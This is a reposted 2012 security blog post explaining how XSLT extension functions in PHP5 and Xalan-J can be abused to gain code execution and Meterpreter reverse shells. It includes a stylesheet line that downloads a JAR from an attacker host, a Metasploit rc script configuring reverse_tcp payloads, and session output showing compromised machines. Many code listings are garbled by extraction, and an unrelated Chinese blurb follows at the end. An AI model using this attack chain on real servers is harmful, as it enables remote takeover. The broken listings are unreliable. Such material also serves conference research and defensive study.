From XSLT code execution to Meterpreter shells

This article will describe how to execute high-level code during
the processing of a XSL transform, with the goal of obtaining some
Meterpreter shells. It applies to any XSLT engine capable of
executing high-level code, even if the published code focus on PHP5
(in a non default configuration) and Xalan-J.

Two minimalist applications processing arbitrary XML documents
and XSLT stylesheets are used as the targets. Functionally, these
applications are minimalist online readers for ATOM feeds. They
were used during my HackInTheBox and HackInParis talks and are now
publically available.

The PHP code:

  1 n";
  5 echo "n";
  6 echo "n";
  7 echo "n";
  8 echo "This ATOM reader is coded in PHP5+XSLT, using libxslt.
n";
  9 
 10 // Get parameters
 11 $url = $_GET['url'];
 12 $xsl = $_GET['xsl'];
 13 
 14 // Load ATOM file
 15 $xmldoc = new DOMDocument();
 16 $xmldoc->load( $url );
 17 
 18 // Load XSLT file
 19 $xsldoc = new DOMDocument();
 20 $xsldoc->load( $xsl );
 21 
 22 // Register PHP functions as XSLT extensions
 23 $xslt = new XSLTProcessor();
 24 $xslt->registerPhpFunctions();
 25 
 26 // Import the stylesheet
 27 $xslt->importStylesheet( $xsldoc );
 28 
 29 // Transform and print
 30 print $xslt->transformToXML( $xmldoc );
 31 
 32 ?>

You may notice on line 24 a call to XSLTProcessor::registerPhpFunctions(). This is
the non default setting that we will exploit. From the
documentation: "PHP 5 >= 5.0.4 / Enables the ability to use
PHP functions as XSLT functions".

The Java code:

  1 
  2 
  3 
  4 ");
  8 
  9 // Get the parameters
 10 String xmlFile    = request.getParameter("url");
 11 String xslFile    = request.getParameter("xsl");
 12 
 13 // Create a XSLT transformer
 14 TransformerFactory tFactory = TransformerFactory.newInstance();
 15 
 16 // Configure the XSLT stylesheet
 17 Transformer transformer = tFactory.newTransformer(new StreamSource(xslFile));
 18 
 19 // Transform the XML file
 20 transformer.transform(new StreamSource(xmlFile), new StreamResult(out));
 21 %>

In both applications, the "xml" parameter contains the URL of a
ATOM feed (for example http://www.us-cert.gov/channels/current.atom). The
"xsl" parameter contains the URL of the XSL style sheet we want to
apply to the XML document.

The following one displays some basic information about the feed
and its entries:

  1 
  4 
  5     
  6     
 10 
 11     
 12     

 17

 18 

	Here's a screenshot of the output (using the US-CERT feed):



	




	OK, everything is now in order. Let's try to execute some more

interesting XSLT code, for example in order to identify the

underlying XSLT engine:

  1 
  2         

  3         
  9 

	The output under PHP5:



	




	The output under Tomcat+Xalan-J:



	




	Now, some basic high-level code displaying the current date. For

this, we need to use the right namespace. For PHP, it's

"http://php.net/xsl" and for Xalan-J, it's

"http://xml.apache.org/xalan/java/java.*".


	In PHP:

  1 
  2         
  5 

	In Java:

  1 
  2         
  6 

	In order to execute arbitrary PHP code, we can try to use

eval(), include() or require(). But they aren't PHP functions but constructs. Luckily, both preg_replace() and assert() are

PHP functions and can be used to execute arbitrary PHP code. We now

have everything needed to execute a PHP Meterpreter 

  1 
  2         
  8 

	We are done regarding PHP!


	We'll now look to Java, where it is much more complex to go from

printing the current date to executing arbitrary classes. In fact,

we'll need to use reflection in order to access enough interesting

Java features to download a remote Meterpreter JAR file. There's

three ways to use reflection. 1) Create your own Java code

accessing the key Java features (and keep this code portable across

versions). That's too hard for me! 2) Use Javapayload to dynamically construct the Java code.

The problem is that Metasploit doesn't include a very recent

version of Javapayload. But that's fine if you're doing everything

by hand 3) Use a well tested and static Java template having all

the needed features and re-use it.


	In the current scenario, we'll take the third option (thanks @mihi42) in order to integrate nicely with Metasploit.

The result XSL style sheet is complex, but works perfectly:

  1 
  3 http://attacker/eviljava/wkaLrNQj.jar
  4 rO0ABXVyAA9bTGphdmEubmV0LlVSTDtSUf0kxRtozQIAAHhwAAAAAXB1cgATW0xqYXZhLmxhbmcuU3RyaW5nO63SVufpHXtHAgAAeHAAAAAAriable>
  5 
  6 
  7 
  8 
  9 
 10 
 11 
 12 
 13 
 14 
 15 
 16 
 17 
 18 
 19 
 20 
 21 
 22 
 23 
 24 
 25 
 26 
 27 
 28 
 29 
 30 
 31 
 32 
 33 
 34 Test Complete!
 35 
 36 

	If we put all this logic in a dedicated Metasploit module, we

end up with "generic_xslt_payloads.rb". This module is not

available in trunk for the moment but you can download it from ticket #6784. Copy it to

"modules/exploits/multi/misc/" and configure it using the following

rc script:

# Load the module
use exploit/multi/misc/generic_xslt_payloads

# Configure and start the PHP version
set TARGET 0
set URIPATH evilphp.xsl
set PAYLOAD php/meterpreter/reverse_tcp
set SRVHOST 192.168.2.218
set SRVPORT 5001
set LHOST 192.168.2.218
set LPORT 4001
exploit -j

# Configure and start the Java version
set TARGET 1
set URIPATH eviljava
set PAYLOAD java/meterpreter/reverse_tcp
set SRVHOST 192.168.2.218
set SRVPORT 5002
set LHOST 192.168.2.218
set LPORT 4002
exploit -j


	You should get two jobs running:

msf  exploit(generic_xslt_payloads) > jobs -l -v

Jobs
====

  Id  Name                                       Payload                       LPORT  URIPATH       Start Time
  --  ----                                       -------                       -----  -------       ----------
  0   Exploit: multi/misc/generic_xslt_payloads  php/meterpreter/reverse_tcp   4001   /evilphp.xsl  Mon Jul 02 18:45:39 +0200 2012
  1   Exploit: multi/misc/generic_xslt_payloads  java/meterpreter/reverse_tcp  4002   /eviljava     Mon Jul 02 18:45:39 +0200 2012


	Then provide the link to the corresponding XSLT code to the

vulnerable applications, and voilà !

msf  exploit(generic_xslt_payloads) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter java/java  SYSTEM @ box08           192.168.2.218:4002 -> 192.168.2.108:1707 (192.168.2.108)
  2   meterpreter php/php    www-data (33) @ box13    192.168.2.218:4001 -> 192.168.2.113:43398 (192.168.2.113)


	0wn3d !


	It should be noted that 1) porting the Java version from Xalan-J

to Saxon should be trivial 2) some client-side softwares like

XMLSpy allow to execute Java code from XSLT. The Metasploit module

was demonstrated during the HackInTheBox conference in Amsterdam,

and the video is available on Youtube (this demo starts at minute 48).


	转自：http://www.agarri.fr/kom/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html



文章来源于lcx.cc:From XSLT code execution to Meterpreter shells
相关推荐: 今天是感恩节，感谢各位朋友一直以来的关注与支持……

佛说： 以平常之心，接受已发生的事。 以宽阔之心，包容对不起你的人。 以不变之心，坚持正确的理念。 以喜悦之心，帮助须帮助的人。 以放下之心，面对难割舍的事。 以美好之心，欣赏周遭的事物。 以真诚之心，对待每一个人。 以感恩之心，感激拥有的一切。 核总说： 去…